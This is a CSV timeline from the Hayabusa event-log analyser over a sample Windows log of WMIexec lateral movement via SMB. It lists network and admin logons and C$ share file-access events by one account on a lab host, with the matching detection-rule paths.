2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
